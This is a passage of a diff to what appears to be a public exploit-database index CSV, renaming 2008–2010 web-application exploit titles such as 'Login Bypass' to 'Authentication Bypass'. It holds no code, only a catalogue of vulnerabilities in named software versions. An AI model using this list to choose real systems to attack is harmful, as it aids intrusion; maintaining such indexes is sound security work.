@@ -20045,7 +20046,7 @@ id,file,description,date,author,platform,type,port
 6171,platforms/php/webapps/6171.pl,"eNdonesia 8.4 (Calendar Module) - SQL Injection",2008-07-30,Jack,php,webapps,0
 6172,platforms/php/webapps/6172.pl,"Pligg CMS 9.9.0 - Remote Code Execution",2008-07-30,"GulfTech Security",php,webapps,0
 6173,platforms/php/webapps/6173.txt,"Pligg CMS 9.9.0 - Cross-Site Scripting / Local File Inclusion / SQL Injection",2008-07-30,"GulfTech Security",php,webapps,0
-6176,platforms/php/webapps/6176.txt,"PHPX 3.5.16 - Cookie Poisoning / Login Bypass",2008-07-31,gnix,php,webapps,0
+6176,platforms/php/webapps/6176.txt,"PHPX 3.5.16 - Cookie Poisoning / Authentication Bypass",2008-07-31,gnix,php,webapps,0
 6177,platforms/php/webapps/6177.php,"Symphony 1.7.01 (non-patched) - Remote Code Execution",2008-07-31,Raz0r,php,webapps,0
 6178,platforms/php/webapps/6178.php,"Coppermine Photo Gallery 1.4.18 - Local File Inclusion / Remote Code Execution",2008-07-31,EgiX,php,webapps,0
 6179,platforms/php/webapps/6179.txt,"LetterIt 2 - 'Language' Local File Inclusion",2008-07-31,NoGe,php,webapps,0
@@ -20542,9 +20543,9 @@ id,file,description,date,author,platform,type,port
 6876,platforms/php/webapps/6876.txt,"Venalsur on-line Booking Centre - Cross-Site Scripting / SQL Injection",2008-10-29,d3b4g,php,webapps,0
 6877,platforms/php/webapps/6877.txt,"Pro Traffic One - 'poll_results.php' SQL Injection",2008-10-29,"Hussin X",php,webapps,0
 6879,platforms/php/webapps/6879.txt,"MyPHP Forum 3.0 - Edit Topics/Blind SQL Injection",2008-10-30,StAkeR,php,webapps,0
-6881,platforms/php/webapps/6881.txt,"Absolute File Send 1.0 - Remote Cookie Handling",2008-10-30,Hakxer,php,webapps,0
+6881,platforms/php/webapps/6881.txt,"Absolute File Send 1.0 - Remote Insecure Cookie Handling",2008-10-30,Hakxer,php,webapps,0
 6882,platforms/php/webapps/6882.txt,"Absolute Podcast 1.0 - Remote Insecure Cookie Handling",2008-10-30,Hakxer,php,webapps,0
-6883,platforms/php/webapps/6883.txt,"Absolute Poll Manager XE 4.1 - Cookie Handling",2008-10-30,Hakxer,php,webapps,0
+6883,platforms/php/webapps/6883.txt,"Absolute Poll Manager XE 4.1 - Insecure Cookie Handling",2008-10-30,Hakxer,php,webapps,0
 6885,platforms/php/webapps/6885.txt,"e107 Plugin lyrics_menu - 'l_id' SQL Injection",2008-10-31,ZoRLu,php,webapps,0
 6886,platforms/php/webapps/6886.txt,"Tribiq CMS 5.0.9a (Beta) - Insecure Cookie Handling",2008-10-31,ZoRLu,php,webapps,0
 6887,platforms/php/webapps/6887.txt,"Cybershade CMS 0.2b - Remote File Inclusion",2008-10-31,w0cker,php,webapps,0
@@ -20644,7 +20645,7 @@ id,file,description,date,author,platform,type,port
 6988,platforms/php/webapps/6988.txt,"Tours Manager 1.0 - SQL Injection",2008-11-04,G4N0K,php,webapps,0
 6989,platforms/php/webapps/6989.txt,"WEBBDOMAIN Post Card 1.02 - Authentication Bypass",2008-11-04,x0r,php,webapps,0
 6990,platforms/php/webapps/6990.txt,"nicLOR Sito - includefile Local File Inclusion",2008-11-04,StAkeR,php,webapps,0
-6991,platforms/php/webapps/6991.txt,"TR News 2.1 - 'login.php' Remote Login Bypass",2008-11-04,StAkeR,php,webapps,0
+6991,platforms/php/webapps/6991.txt,"TR News 2.1 - 'login.php' Remote Authentication Bypass",2008-11-04,StAkeR,php,webapps,0
 6992,platforms/php/webapps/6992.txt,"wotw 5.0 - Local/Remote File Inclusion",2008-11-04,dun,php,webapps,0
 6993,platforms/php/webapps/6993.php,"Simple Machines Forum (SMF) 1.1.6 - Code Execution",2008-11-04,"Charles Fol",php,webapps,0
 6995,platforms/php/webapps/6995.txt,"phpBB Mod Small ShoutBox 1.4 - Remote Edit/Delete Messages",2008-11-05,StAkeR,php,webapps,0
@@ -20989,7 +20990,7 @@ id,file,description,date,author,platform,type,port
 7415,platforms/asp/webapps/7415.txt,"CFMBLOG - 'categorynbr' Blind SQL Injection",2008-12-10,AlpHaNiX,asp,webapps,0
 7416,platforms/asp/webapps/7416.txt,"CF_Forum - Blind SQL Injection",2008-12-10,AlpHaNiX,asp,webapps,0
 7417,platforms/php/webapps/7417.txt,"phpAddEdit 1.3 - 'editform' Local File Inclusion",2008-12-10,nuclear,php,webapps,0
-7418,platforms/php/webapps/7418.txt,"PhpAddEdit 1.3 - 'cookie' Login Bypass",2008-12-11,x0r,php,webapps,0
+7418,platforms/php/webapps/7418.txt,"PhpAddEdit 1.3 - 'cookie' Authentication Bypass",2008-12-11,x0r,php,webapps,0
 7419,platforms/asp/webapps/7419.txt,"evCal Events Calendar - Database Disclosure",2008-12-11,Cyber-Zone,asp,webapps,0
 7420,platforms/asp/webapps/7420.txt,"MyCal Personal Events Calendar - Database Disclosure",2008-12-11,CoBRa_21,asp,webapps,0
 7421,platforms/php/webapps/7421.txt,"EZ Publish 3.9.0/3.9.5/3.10.1 - Command Execution (Admin Required)",2008-12-11,s4avrd0w,php,webapps,0
@@ -21069,7 +21070,7 @@ id,file,description,date,author,platform,type,port
 7508,platforms/asp/webapps/7508.txt,"QuickerSite Easy CMS - Database Disclosure",2008-12-17,AlpHaNiX,asp,webapps,0
 7509,platforms/php/webapps/7509.txt,"Mini File Host 1.x - Arbitrary '.PHP' File Upload",2008-12-18,Pouya_Server,php,webapps,0
 7510,platforms/php/webapps/7510.txt,"2532/Gigs 1.2.2 Stable - Multiple Vulnerabilities",2008-12-18,Osirys,php,webapps,0
-7511,platforms/php/webapps/7511.txt,"2532/Gigs 1.2.2 Stable - Remote Login Bypass",2008-12-18,StAkeR,php,webapps,0
+7511,platforms/php/webapps/7511.txt,"2532/Gigs 1.2.2 Stable - Remote Authentication Bypass",2008-12-18,StAkeR,php,webapps,0
 7512,platforms/php/webapps/7512.php,"2532/Gigs 1.2.2 Stable - Remote Command Execution",2008-12-18,StAkeR,php,webapps,0
 7513,platforms/php/webapps/7513.txt,"Calendar Script 1.1 - Insecure Cookie Handling",2008-12-18,Osirys,php,webapps,0
 7514,platforms/php/webapps/7514.txt,"I-Rater Basic - SQL Injection",2008-12-18,boom3rang,php,webapps,0
@@ -21150,7 +21151,7 @@ id,file,description,date,author,platform,type,port
 7619,platforms/php/webapps/7619.txt,"eDNews 2.0 - SQL Injection",2008-12-29,"Virangar Security",php,webapps,0
 7620,platforms/php/webapps/7620.txt,"ThePortal 2.2 - Arbitrary File Upload",2008-12-29,siurek22,php,webapps,0
 7621,platforms/php/webapps/7621.txt,"PHPAlumni - SQL Injection",2008-12-29,Mr.SQL,php,webapps,0
-7622,platforms/php/webapps/7622.txt,"Flexcustomer 0.0.6 - Admin Login Bypass / Possible PHP code writing",2008-12-29,Osirys,php,webapps,0
+7622,platforms/php/webapps/7622.txt,"Flexcustomer 0.0.6 - Admin Authentication Bypass / Possible PHP code writing",2008-12-29,Osirys,php,webapps,0
 7624,platforms/php/webapps/7624.txt,"Flexphpic 0.0.x - Authentication Bypass",2008-12-30,S.W.A.T.,php,webapps,0
 7625,platforms/php/webapps/7625.txt,"CMScout 2.06 - SQL Injection / Local File Inclusion",2008-12-30,SirGod,php,webapps,0
 7626,platforms/php/webapps/7626.txt,"Mole Group Vacation Estate Listing Script - Blind SQL Injection",2008-12-30,x0r,php,webapps,0
@@ -21385,7 +21386,7 @@ id,file,description,date,author,platform,type,port
 7991,platforms/asp/webapps/7991.txt,"GR Note 0.94 Beta - (Authentication Bypass) Remote Database Backup",2009-02-04,JosS,asp,webapps,0
 7992,platforms/php/webapps/7992.txt,"ClearBudget 0.6.1 - Insecure Cookie Handling / Local File Inclusion",2009-02-05,SirGod,php,webapps,0
 7993,platforms/php/webapps/7993.txt,"Kipper 2.01 - Cross-Site Scripting / Local File Inclusion / File Disclosure",2009-02-05,RoMaNcYxHaCkEr,php,webapps,0
-7996,platforms/php/webapps/7996.txt,"ClearBudget 0.6.1 - Insecure Database Download",2009-02-05,Room-Hacker,php,webapps,0
+7996,platforms/php/webapps/7996.txt,"ClearBudget 0.6.1 - Insecure Database Disclosure",2009-02-05,Room-Hacker,php,webapps,0
 7997,platforms/php/webapps/7997.htm,"txtBB 1.0 RC3 HTML/JS Injection - Add Admin Privileges Exploit",2009-02-05,cOndemned,php,webapps,0
 7998,platforms/php/webapps/7998.txt,"WikkiTikkiTavi 1.11 - Arbitrary '.PHP' File Upload",2009-02-06,ByALBAYX,php,webapps,0
 7999,platforms/php/webapps/7999.pl,"Simple PHP News 1.0 - Remote Command Execution",2009-02-06,Osirys,php,webapps,0
@@ -21640,7 +21641,7 @@ id,file,description,date,author,platform,type,port
 8461,platforms/php/webapps/8461.txt,"chCounter 3.1.3 - (Authentication Bypass) SQL Injection",2009-04-16,tmh,php,webapps,0
 8464,platforms/php/webapps/8464.txt,"Tiny Blogr 1.0.0 rc4 - Authentication Bypass",2009-04-17,"Salvatore Fresta",php,webapps,0
 8468,platforms/php/webapps/8468.txt,"Limbo CMS 1.0.4.2 - Cross-Site Request Forgery / Privilege Escalation (PoC)",2009-04-17,"Alfons Luja",php,webapps,0
-8471,platforms/php/webapps/8471.txt,"ClanTiger < 1.1.1 - Multiple Cookie Handling Vulnerabilities",2009-04-17,YEnH4ckEr,php,webapps,0
+8471,platforms/php/webapps/8471.txt,"ClanTiger < 1.1.1 - Multiple Insecure Cookie Handling Vulnerabilities",2009-04-17,YEnH4ckEr,php,webapps,0
 8472,platforms/php/webapps/8472.txt,"ClanTiger 1.1.1 - Authentication Bypass",2009-04-17,YEnH4ckEr,php,webapps,0
 8473,platforms/php/webapps/8473.pl,"ClanTiger 1.1.1 - 'slug' Blind SQL Injection",2009-04-17,YEnH4ckEr,php,webapps,0
 8474,platforms/php/webapps/8474.txt,"e-cart.biz Shopping Cart - Arbitrary File Upload",2009-04-17,ahmadbady,php,webapps,0
@@ -21768,7 +21769,7 @@ id,file,description,date,author,platform,type,port
 8697,platforms/php/webapps/8697.txt,"Joomla! Component ArtForms 2.1 b7 - Remote File Inclusion",2009-05-15,iskorpitx,php,webapps,0
 8699,platforms/php/webapps/8699.php,"Harland Scripts 11 - Products Remote Command Execution",2009-05-15,G4N0K,php,webapps,0
 8700,platforms/php/webapps/8700.txt,"Rama CMS 0.9.8 - 'download.php' File Disclosure",2009-05-15,Br0ly,php,webapps,0
-8702,platforms/php/webapps/8702.txt,"2DayBiz Custom T-shirt Design -(SQL Injection / Cross-Site Scripting",2009-05-15,snakespc,php,webapps,0
+8702,platforms/php/webapps/8702.txt,"2DayBiz Custom T-shirt Design - SQL Injection / Cross-Site Scripting",2009-05-15,snakespc,php,webapps,0
 8705,platforms/asp/webapps/8705.txt,"DMXReady Registration Manager 1.1 - Database Disclosure",2009-05-15,S4S-T3rr0r!sT,asp,webapps,0
 8706,platforms/php/webapps/8706.pl,"PHPenpals 1.1 - 'mail.php?ID' SQL Injection",2009-05-15,Br0ly,php,webapps,0
 8707,platforms/php/webapps/8707.txt,"my-colex 1.4.2 - Authentication Bypass / Cross-Site Scripting / SQL Injection",2009-05-15,YEnH4ckEr,php,webapps,0
@@ -22075,7 +22076,7 @@ id,file,description,date,author,platform,type,port
 9144,platforms/php/webapps/9144.txt,"Mobilelib Gold 3.0 - Local File Disclosure",2009-07-14,Qabandi,php,webapps,0
 9145,platforms/php/webapps/9145.php,"Traidnt UP 2.0 - Blind SQL Injection",2009-07-14,Qabandi,php,webapps,0
 9150,platforms/php/webapps/9150.txt,"WordPress Plugin My Category Order 2.8 - SQL Injection",2009-07-15,"Manh Luat",php,webapps,0
-9151,platforms/php/webapps/9151.txt,"ILIAS Lms 3.9.9/3.10.7 - Arbitrary Edition/Info Disclosure Vulnerabilities",2009-07-15,YEnH4ckEr,php,webapps,0
+9151,platforms/php/webapps/9151.txt,"ILIAS Lms 3.9.9/3.10.7 - Arbitrary Edition/Information Disclosure Vulnerabilities",2009-07-15,YEnH4ckEr,php,webapps,0
 9153,platforms/php/webapps/9153.txt,"Admin News Tools 2.5 - 'fichier' Remote File Disclosure",2009-07-15,Securitylab.ir,php,webapps,0
 9154,platforms/php/webapps/9154.js,"ZenPhoto 1.2.5 - Completely Blind SQL Injection",2009-07-15,petros,php,webapps,0
 9155,platforms/php/webapps/9155.txt,"PHPGenealogy 2.0 - 'DataDirectory' Remote File Inclusion",2009-07-15,"Khashayar Fereidani",php,webapps,0
@@ -22410,7 +22411,7 @@ id,file,description,date,author,platform,type,port
 9857,platforms/asp/webapps/9857.txt,"AfterLogic WebMail Pro 4.7.10 - Cross-Site Scripting",2009-10-05,"Sébastien Duquette",asp,webapps,0
 9861,platforms/unix/webapps/9861.rb,"Nagios3 - statuswml.cgi Command Injection (Metasploit)",2009-10-30,"H D Moore",unix,webapps,0
 9863,platforms/php/webapps/9863.txt,"Achievo 1.3.4 - Cross-Site Scripting",2009-10-14,"Ryan Dewhurst",php,webapps,0
-9867,platforms/php/webapps/9867.txt,"Amiro.CMS 5.4.0.0 - Folder Disclosure",2009-10-19,"Vladimir Vorontsov",php,webapps,0
+9867,platforms/php/webapps/9867.txt,"Amiro.CMS 5.4.0.0 - Path Disclosure",2009-10-19,"Vladimir Vorontsov",php,webapps,0
 9872,platforms/multiple/webapps/9872.txt,"boxalino 09.05.25-0421 - Directory Traversal",2009-10-20,"Axel Neumann",multiple,webapps,0
 9873,platforms/windows/webapps/9873.txt,"Cherokee 0.5.4 - Directory Traversal",2009-10-28,Dr_IDE,windows,webapps,0
 9875,platforms/php/webapps/9875.txt,"CubeCart 4 - Session Management Bypass",2009-10-30,"Bogdan Calin",php,webapps,0
@@ -22425,7 +22426,7 @@ id,file,description,date,author,platform,type,port
 9891,platforms/php/webapps/9891.txt,"Joomla! Component Jshop - SQL Injection",2009-10-23,"Don Tukulesto",php,webapps,0
 9892,platforms/php/webapps/9892.txt,"Joomla! Component Photo Blog alpha 3 < alpha 3a - SQL Injection",2009-10-23,kaMtiEz,php,webapps,0
 9897,platforms/php/webapps/9897.txt,"Mongoose Web Server 2.8 - Source Disclosure",2009-10-23,Dr_IDE,php,webapps,0
-9898,platforms/multiple/webapps/9898.txt,"Mura CMS 5.1 - Root Folder Disclosure",2009-10-29,"Vladimir Vorontsov",multiple,webapps,0
+9898,platforms/multiple/webapps/9898.txt,"Mura CMS 5.1 - Root Path Disclosure",2009-10-29,"Vladimir Vorontsov",multiple,webapps,0
 9903,platforms/php/webapps/9903.txt,"OpenDocMan 1.2.5 - Cross-Site Scripting / SQL Injection",2009-10-20,"Amol Naik",php,webapps,0
 9904,platforms/asp/webapps/9904.txt,"PSArt 1.2 - SQL Injection",2009-10-30,"Securitylab Research",asp,webapps,0
 9906,platforms/php/webapps/9906.rb,"Mambo 4.6.4 - Cache Lite Output Remote File Inclusion (Metasploit)",2008-06-14,MC,php,webapps,0
@@ -22858,18 +22859,18 @@ id,file,description,date,author,platform,type,port
 10760,platforms/php/webapps/10760.txt,"Joomla! Component com_calendario - Blind SQL Injection",2009-12-28,Mr.tro0oqy,php,webapps,0
 10762,platforms/php/webapps/10762.txt,"Sunbyte e-Flower - SQL Injection",2009-12-28,"Don Tukulesto",php,webapps,0
 10763,platforms/php/webapps/10763.txt,"Dren's PHP Uploader - Arbitrary File Upload",2009-12-28,"Cyb3r IntRue",php,webapps,0
-10767,platforms/asp/webapps/10767.txt,"jgbbs-3.0beta1 - Database Download",2009-12-29,indoushka,asp,webapps,0
-10770,platforms/asp/webapps/10770.txt,"PSnews - Database Download",2009-12-29,indoushka,asp,webapps,0
+10767,platforms/asp/webapps/10767.txt,"jgbbs-3.0beta1 - Database Disclosure",2009-12-29,indoushka,asp,webapps,0
+10770,platforms/asp/webapps/10770.txt,"PSnews - Database Disclosure",2009-12-29,indoushka,asp,webapps,0
 10771,platforms/asp/webapps/10771.txt,"QuickEStore 7.9 - SQL Injection / Full Path Disclosure Download",2009-12-29,indoushka,asp,webapps,0
-10772,platforms/asp/webapps/10772.txt,"AspBB - Active Server Page Bulletin Board Database Download",2009-12-29,indoushka,asp,webapps,0
-10773,platforms/asp/webapps/10773.txt,"Futility Forum 1.0 Revamp - Database Download",2009-12-29,indoushka,asp,webapps,0
-10774,platforms/asp/webapps/10774.txt,"htmlArea 2.03 - Database Download",2009-12-29,indoushka,asp,webapps,0
-10775,platforms/asp/webapps/10775.txt,"Uguestbook - Database Download",2009-12-29,indoushka,asp,webapps,0
-10776,platforms/asp/webapps/10776.txt,"BaalASP 2.0 - Database Download",2009-12-29,indoushka,asp,webapps,0
-10777,platforms/asp/webapps/10777.txt,"Fully Functional ASP Forum 1.0 - Database Download",2009-12-29,indoushka,asp,webapps,0
-10778,platforms/asp/webapps/10778.txt,"makit news/blog poster 3.1 - Database Download",2009-12-29,indoushka,asp,webapps,0
+10772,platforms/asp/webapps/10772.txt,"AspBB - Active Server Page Bulletin Board Database Disclosure",2009-12-29,indoushka,asp,webapps,0
+10773,platforms/asp/webapps/10773.txt,"Futility Forum 1.0 Revamp - Database Disclosure",2009-12-29,indoushka,asp,webapps,0
+10774,platforms/asp/webapps/10774.txt,"htmlArea 2.03 - Database Disclosure",2009-12-29,indoushka,asp,webapps,0
+10775,platforms/asp/webapps/10775.txt,"Uguestbook - Database Disclosure",2009-12-29,indoushka,asp,webapps,0
+10776,platforms/asp/webapps/10776.txt,"BaalASP 2.0 - Database Disclosure",2009-12-29,indoushka,asp,webapps,0
+10777,platforms/asp/webapps/10777.txt,"Fully Functional ASP Forum 1.0 - Database Disclosure",2009-12-29,indoushka,asp,webapps,0
+10778,platforms/asp/webapps/10778.txt,"makit news/blog poster 3.1 - Database Disclosure",2009-12-29,indoushka,asp,webapps,0
 10779,platforms/php/webapps/10779.txt,"DirectAdmin 1.34.0 - Cross-Site Request Forgery (Add Admin)",2009-12-29,SecurityRules,php,webapps,0
-10780,platforms/asp/webapps/10780.txt,"ASP Battle Blog - Database Download",2009-12-29,indoushka,asp,webapps,0
+10780,platforms/asp/webapps/10780.txt,"ASP Battle Blog - Database Disclosure",2009-12-29,indoushka,asp,webapps,0
 10781,platforms/php/webapps/10781.txt,"ActiveKB - Remote File Inclusion",2009-12-29,indoushka,php,webapps,0
 10784,platforms/php/webapps/10784.txt,"eStore 1.0.2 - SQL Injection",2009-12-29,R3VAN_BASTARD,php,webapps,0
 10788,platforms/php/webapps/10788.txt,"Helpdesk Pilot Knowledge Base 4.4.0 - SQL Injection",2009-12-29,kaMtiEz,php,webapps,0
@@ -22939,7 +22940,7 @@ id,file,description,date,author,platform,type,port
 10905,platforms/php/webapps/10905.txt,"Joomla! Component com_avosbillets - Blind SQL Injection",2010-01-01,Pyske,php,webapps,0
 10906,platforms/php/webapps/10906.txt,"DZOIC ClipHouse - Authentication Bypass",2010-01-02,R3d-D3V!L,php,webapps,0
 10910,platforms/php/webapps/10910.txt,"HLstatsX Community Edition 1.6.5 - Cross-Site Scripting",2010-01-02,Sora,php,webapps,0
-10912,platforms/php/webapps/10912.txt,"Proxyroll.com Clone PHP Script - Cookie Handling",2010-01-02,DigitALL,php,webapps,0
+10912,platforms/php/webapps/10912.txt,"Proxyroll.com Clone PHP Script - Insecure Cookie Handling",2010-01-02,DigitALL,php,webapps,0
 10921,platforms/php/webapps/10921.txt,"eazyPortal 1.0.0 - Multiple Vulnerabilities",2010-01-02,"Milos Zivanovic",php,webapps,0
 10923,platforms/php/webapps/10923.txt,"superlink script 1.0 - 'id' SQL Injection",2010-01-02,Red-D3v1L,php,webapps,0
 10924,platforms/php/webapps/10924.txt,"AL-Athkat.2.0 - Cross-Site Scripting",2010-01-02,indoushka,php,webapps,0
@@ -22984,14 +22985,14 @@ id,file,description,date,author,platform,type,port
 11002,platforms/php/webapps/11002.txt,"ImagoScripts Deviant Art Clone - SQL Injection",2010-01-04,alnjm33,php,webapps,0
 11003,platforms/php/webapps/11003.txt,"LightOpenCMS 0.1 - 'smarty.php' Remote File Inclusion",2010-01-04,"Zer0 Thunder",php,webapps,0
 11005,platforms/asp/webapps/11005.txt,"KMSoft Guestbook 1.0 - Database Disclosure",2010-01-04,LionTurk,asp,webapps,0
-11008,platforms/asp/webapps/11008.txt,"YP Portal MS-Pro Surumu 1.0 - Database Download",2010-01-05,indoushka,asp,webapps,0
+11008,platforms/asp/webapps/11008.txt,"YP Portal MS-Pro Surumu 1.0 - Database Disclosure",2010-01-05,indoushka,asp,webapps,0
 11012,platforms/php/webapps/11012.txt,"ITaco Group ITaco.biz - 'view_news' SQL Injection",2010-01-06,Err0R,php,webapps,0
 11013,platforms/php/webapps/11013.txt,"PHPDirector Game Edition 0.1 - Local File Inclusion / SQL Injection / Cross-Site Scripting",2010-01-06,"Zer0 Thunder",php,webapps,0
 11014,platforms/php/webapps/11014.txt,"Myuploader - Arbitrary File Upload",2010-01-06,S2K9,php,webapps,0
-11015,platforms/asp/webapps/11015.txt,"Lebi soft Ziyaretci Defteri 7.5 - Database Download",2010-01-06,indoushka,asp,webapps,0
-11016,platforms/asp/webapps/11016.txt,"Net Gitar Shop 1.0 - Database Download",2010-01-06,indoushka,asp,webapps,0
+11015,platforms/asp/webapps/11015.txt,"Lebi soft Ziyaretci Defteri 7.5 - Database Disclosure",2010-01-06,indoushka,asp,webapps,0
+11016,platforms/asp/webapps/11016.txt,"Net Gitar Shop 1.0 - Database Disclosure",2010-01-06,indoushka,asp,webapps,0
 11017,platforms/php/webapps/11017.txt,"PHPDug 2.0.0 - Cross-Site Scripting",2010-01-06,indoushka,php,webapps,0
-11018,platforms/asp/webapps/11018.txt,"VP-ASP Shopping Cart 7.0 - Database Download",2010-01-06,indoushka,asp,webapps,0
+11018,platforms/asp/webapps/11018.txt,"VP-ASP Shopping Cart 7.0 - Database Disclosure",2010-01-06,indoushka,asp,webapps,0
 11019,platforms/php/webapps/11019.txt,"MobPartner Counter - Arbitrary File Upload",2010-01-06,"wlhaan hacker",php,webapps,0
 11023,platforms/asp/webapps/11023.txt,"Erolife AjxGaleri VT - Database Disclosure",2010-01-06,LionTurk,asp,webapps,0
 11024,platforms/php/webapps/11024.txt,"Joomla! Component com_perchagallery - SQL Injection",2010-01-06,FL0RiX,php,webapps,0
@@ -23041,7 +23042,7 @@ id,file,description,date,author,platform,type,port
 11124,platforms/php/webapps/11124.txt,"CiviCRM 3.1 < Beta 5 - Multiple Cross-Site Scripting Vulnerabilities",2010-01-13,h00die,php,webapps,0
 11126,platforms/php/webapps/11126.txt,"Populum 2.3 - SQL Injection",2010-01-13,SiLeNtp0is0n,php,webapps,80
 11127,platforms/php/webapps/11127.txt,"Hesk Help Desk 2.1 - Cross-Site Request Forgery",2010-01-13,The.Morpheus,php,webapps,80
-11134,platforms/asp/webapps/11134.txt,"Asp VevoCart Control System 3.0.4 - Database Download",2010-01-13,indoushka,asp,webapps,0
+11134,platforms/asp/webapps/11134.txt,"Asp VevoCart Control System 3.0.4 - Database Disclosure",2010-01-13,indoushka,asp,webapps,0
 11135,platforms/php/webapps/11135.txt,"PSI CMS 0.3.1 - SQL Injection",2010-01-13,"learn3r hacker",php,webapps,0
 11136,platforms/php/webapps/11136.txt,"Public Media Manager - SQL Injection",2010-01-13,"learn3r hacker",php,webapps,0
 11140,platforms/php/webapps/11140.txt,"Joomla! Component com_articlemanager - SQL Injection",2010-01-14,FL0RiX,php,webapps,0
@@ -23050,8 +23051,8 @@ id,file,description,date,author,platform,type,port
 11148,platforms/php/webapps/11148.txt,"PonVFTP - Bypass / Arbitrary File Upload",2010-01-15,S2K9,php,webapps,0
 11155,platforms/php/webapps/11155.txt,"Transload Script - Arbitrary File Upload",2010-01-16,DigitALL,php,webapps,0
 11156,platforms/php/webapps/11156.txt,"PHP-RESIDENCE 0.7.2 - Multiple Local File Inclusions",2010-01-16,cr4wl3r,php,webapps,0
-11157,platforms/php/webapps/11157.txt,"MoME CMS 0.8.5 - Remote Login Bypass",2010-01-16,cr4wl3r,php,webapps,0
-11158,platforms/php/webapps/11158.txt,"RoseOnlineCMS 3 B1 - Remote Login Bypass",2010-01-16,cr4wl3r,php,webapps,0
+11157,platforms/php/webapps/11157.txt,"MoME CMS 0.8.5 - Remote Authentication Bypass",2010-01-16,cr4wl3r,php,webapps,0
+11158,platforms/php/webapps/11158.txt,"RoseOnlineCMS 3 B1 - Remote Authentication Bypass",2010-01-16,cr4wl3r,php,webapps,0
 11159,platforms/php/webapps/11159.txt,"DasForum - 'layout' Local File Inclusion",2010-01-16,cr4wl3r,php,webapps,0
 11162,platforms/php/webapps/11162.txt,"CLONEBID B2B Marketplace - Multiple Vulnerabilities",2010-01-16,"Hamza 'MizoZ' N.",php,webapps,0
 11163,platforms/php/webapps/11163.txt,"ITechSctipts Alibaba Clone - Multiple Vulnerabilities",2010-01-16,"Hamza 'MizoZ' N.",php,webapps,0
@@ -23068,7 +23069,7 @@ id,file,description,date,author,platform,type,port
 11187,platforms/multiple/webapps/11187.txt,"FreePBX 2.5.x - Information Disclosure",2010-01-18,"Ivan Huertas",multiple,webapps,0
 11188,platforms/php/webapps/11188.txt,"Fatwiki (fwiki) 1.0 - Remote File Inclusion",2010-01-18,kaMtiEz,php,webapps,0
 11189,platforms/php/webapps/11189.txt,"Soft Direct 1.05 - Multiple Vulnerabilities",2010-01-18,indoushka,php,webapps,0
-11198,platforms/php/webapps/11198.txt,"al3jeb script - Remote Login Bypass",2010-01-19,cr4wl3r,php,webapps,0
+11198,platforms/php/webapps/11198.txt,"al3jeb script - Remote Authentication Bypass",2010-01-19,cr4wl3r,php,webapps,0
 11211,platforms/multiple/webapps/11211.txt,"cPanel - HTTP Response Splitting",2010-01-21,Trancer,multiple,webapps,0
 11212,platforms/asp/webapps/11212.txt,"eWebeditor - Directory Traversal",2010-01-21,anonymous,asp,webapps,0
 11213,platforms/php/webapps/11213.txt,"Joomla! Component com_book - SQL Injection",2010-01-21,Evil-Cod3r,php,webapps,0
@@ -23306,7 +23307,7 @@ id,file,description,date,author,platform,type,port
 11606,platforms/asp/webapps/11606.txt,"Majoda CMS - Authentication Bypass",2010-02-28,Phenom,asp,webapps,0
 11609,platforms/php/webapps/11609.txt,"phptroubleticket 2.0 - 'id' SQL Injection",2010-03-01,kaMtiEz,php,webapps,0
 11610,platforms/php/webapps/11610.txt,"CMS by MyWorks - Multiple Vulnerabilities",2010-03-01,Palyo34,php,webapps,0
-11611,platforms/asp/webapps/11611.txt,"Al Sat Scripti - Database Download",2010-03-02,indoushka,asp,webapps,0
+11611,platforms/asp/webapps/11611.txt,"Al Sat Scripti - Database Disclosure",2010-03-02,indoushka,asp,webapps,0
 11612,platforms/php/webapps/11612.txt,"osCSS 1.2.1 - Database Backups Disclosure",2010-03-02,indoushka,php,webapps,0
 11613,platforms/php/webapps/11613.txt,"PHP Advanced Transfer Manager 1.10 - Arbitrary File Upload",2010-03-02,indoushka,php,webapps,0
 11614,platforms/php/webapps/11614.txt,"Uploadify Sample Collection - Arbitrary File Upload",2010-03-02,indoushka,php,webapps,0
@@ -23678,9 +23679,9 @@ id,file,description,date,author,platform,type,port
 12193,platforms/php/webapps/12193.txt,"Openurgence vaccin 1.03 - Local File Inclusion / Remote File Inclusion",2010-04-13,cr4wl3r,php,webapps,0
 12194,platforms/php/webapps/12194.txt,"Police Municipale Open Main Courante 1.01beta - Local File Inclusion / Remote File Inclusion",2010-04-13,cr4wl3r,php,webapps,0
 12195,platforms/php/webapps/12195.rb,"joelz bulletin board 0.9.9rc3 - Multiple SQL Injections",2010-04-13,"Easy Laster",php,webapps,0
-12197,platforms/asp/webapps/12197.txt,"Mp3 MuZik - DataBase Download",2010-04-13,indoushka,asp,webapps,0
+12197,platforms/asp/webapps/12197.txt,"Mp3 MuZik - Database Disclosure",2010-04-13,indoushka,asp,webapps,0
 12198,platforms/php/webapps/12198.txt,"Games Script - 'Galore' Backup Dump",2010-04-13,indoushka,php,webapps,0
-12199,platforms/asp/webapps/12199.txt,"My School Script - Data Base Download",2010-04-13,indoushka,asp,webapps,0
+12199,platforms/asp/webapps/12199.txt,"My School Script - Database Disclosure",2010-04-13,indoushka,asp,webapps,0
 12200,platforms/php/webapps/12200.txt,"Joomla! Component QPersonel 1.0.2 - SQL Injection",2010-04-13,Valentin,php,webapps,0
 12212,platforms/php/webapps/12212.txt,"Opentel Openmairie tel 1.02 - Local File Inclusion",2010-04-14,cr4wl3r,php,webapps,0
 12218,platforms/asp/webapps/12218.txt,"School Management System Pro 6.0.0 - Backup Dump",2010-04-14,indoushka,asp,webapps,0
@@ -23994,7 +23995,7 @@ id,file,description,date,author,platform,type,port
 12692,platforms/php/webapps/12692.txt,"WordPress Plugin TinyBrowser - Arbitrary File Upload",2010-05-22,Ra3cH,php,webapps,0
 12693,platforms/asp/webapps/12693.txt,"Asset Manager - Arbitrary File Upload",2010-05-22,Ra3cH,asp,webapps,0
 12694,platforms/php/webapps/12694.txt,"Tochin eCommerce - Multiple Remote Exploits",2010-05-22,cyberlog,php,webapps,0
-12695,platforms/php/webapps/12695.txt,"Azimut Technologie - Admin Login Bypass",2010-05-22,Ra3cH,php,webapps,0
+12695,platforms/php/webapps/12695.txt,"Azimut Technologie - Admin Authentication Bypass",2010-05-22,Ra3cH,php,webapps,0
 12696,platforms/php/webapps/12696.txt,"E-Commerce Group - 'cat.php' SQL Injection",2010-05-22,"BLack Revenge",php,webapps,0
 12697,platforms/php/webapps/12697.php,"hustoj - 'FCKeditor' Arbitrary File Upload",2010-05-22,eidelweiss,php,webapps,0
 12699,platforms/php/webapps/12699.txt,"eWebEditor 1.x - 'WYSIWYG' Arbitrary File Upload",2010-05-22,Ma3sTr0-Dz,php,webapps,0
@@ -24106,7 +24107,7 @@ id,file,description,date,author,platform,type,port
